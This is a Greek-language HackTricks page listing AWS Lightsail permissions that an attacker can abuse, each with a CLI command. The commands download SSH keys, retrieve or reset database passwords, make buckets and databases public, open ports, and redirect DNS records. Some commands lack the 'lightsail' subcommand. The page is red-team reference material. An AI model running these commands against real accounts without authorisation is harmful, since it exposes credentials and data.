AWS - Lightsail Privesc

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Lightsail

Για περισσότερες πληροφορίες σχετικά με το Lightsail ελέγξτε:

Είναι σημαντικό να σημειωθεί ότι το Lightsail δεν χρησιμοποιεί ρόλους IAM που ανήκουν στον χρήστη αλλά σε έναν διαχειριζόμενο λογαριασμό AWS, οπότε δεν μπορείτε να εκμεταλλευτείτε αυτή την υπηρεσία για privesc. Ωστόσο, ευαίσθητα δεδομένα όπως κώδικας, API keys και πληροφορίες βάσης δεδομένων θα μπορούσαν να βρεθούν σε αυτή την υπηρεσία.

`lightsail:DownloadDefaultKeyPair`

Αυτή η άδεια θα σας επιτρέψει να αποκτήσετε τα SSH keys για να έχετε πρόσβαση στις περιπτώσεις:

aws lightsail download-default-key-pair

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.

`lightsail:GetInstanceAccessDetails`

Αυτή η άδεια θα σας επιτρέψει να δημιουργήσετε κλειδιά SSH για να αποκτήσετε πρόσβαση στις περιπτώσεις:

aws lightsail get-instance-access-details --instance-name <instance_name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στις περιπτώσεις.

`lightsail:CreateBucketAccessKey`

Αυτή η άδεια θα σας επιτρέψει να αποκτήσετε ένα κλειδί για να έχετε πρόσβαση στον κάδο:

aws lightsail create-bucket-access-key --bucket-name <name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στον κάδο.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Αυτή η άδεια θα σας επιτρέψει να αποκτήσετε τα διαπιστευτήρια για να έχετε πρόσβαση στη βάση δεδομένων:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στη βάση δεδομένων.

`lightsail:UpdateRelationalDatabase`

Αυτή η άδεια θα σας επιτρέψει να αλλάξετε τον κωδικό πρόσβασης για να αποκτήσετε πρόσβαση στη βάση δεδομένων:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Αν η βάση δεδομένων δεν είναι δημόσια, μπορείτε επίσης να την κάνετε δημόσια με αυτές τις άδειες με

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Πιθανές Επιπτώσεις: Βρείτε ευαίσθητες πληροφορίες μέσα στη βάση δεδομένων.

`lightsail:OpenInstancePublicPorts`

Αυτή η άδεια επιτρέπει το άνοιγμα θυρών στο Διαδίκτυο.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητες θύρες.

`lightsail:PutInstancePublicPorts`

Αυτή η άδεια επιτρέπει το άνοιγμα θυρών στο Διαδίκτυο. Σημειώστε ότι η κλήση θα κλείσει οποιαδήποτε θύρα έχει ανοιχτεί και δεν έχει καθοριστεί σε αυτήν.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητες θύρες.

`lightsail:SetResourceAccessForBucket`

Αυτή η άδεια επιτρέπει να δώσετε σε μια παρουσία πρόσβαση σε έναν κάδο χωρίς επιπλέον διαπιστευτήρια.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Πιθανές Επιπτώσεις: Πιθανή νέα πρόσβαση σε buckets με ευαίσθητες πληροφορίες.

`lightsail:UpdateBucket`

Με αυτή την άδεια, ένας επιτιθέμενος θα μπορούσε να παραχωρήσει την δική του AWS λογαριασμό πρόσβαση ανάγνωσης σε buckets ή ακόμα και να κάνει τα buckets δημόσια σε όλους:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Πιθανές Επιπτώσεις: Πιθανή νέα πρόσβαση σε buckets με ευαίσθητες πληροφορίες.

`lightsail:UpdateContainerService`

Με αυτές τις άδειες, ένας επιτιθέμενος θα μπορούσε να παραχωρήσει πρόσβαση σε ιδιωτικά ECRs από την υπηρεσία κοντέινερ.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Πιθανές Επιπτώσεις: Λάβετε ευαίσθητες πληροφορίες από ιδιωτικό ECR

`lightsail:CreateDomainEntry`

Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να δημιουργήσει υποτομέα και να τον κατευθύνει στη δική του διεύθυνση IP (κατάληψη υποτομέα), ή να δημιουργήσει ένα SPF record που του επιτρέπει να παραποιεί emails από το domain, ή ακόμα και να ορίσει το κύριο domain στη δική του διεύθυνση IP.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Πιθανές Επιπτώσεις: Κατάληψη ενός τομέα

`lightsail:UpdateDomainEntry`

Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να δημιουργήσει υποτομέα και να τον κατευθύνει στη δική του διεύθυνση IP (κατάληψη υποτομέα), ή να δημιουργήσει ένα SPF record που του επιτρέπει να παραποιεί emails από τον τομέα, ή ακόμα και να ρυθμίσει τον κύριο τομέα στη δική του διεύθυνση IP.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Πιθανές Επιπτώσεις: Κατάληψη ενός τομέα

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 3 days ago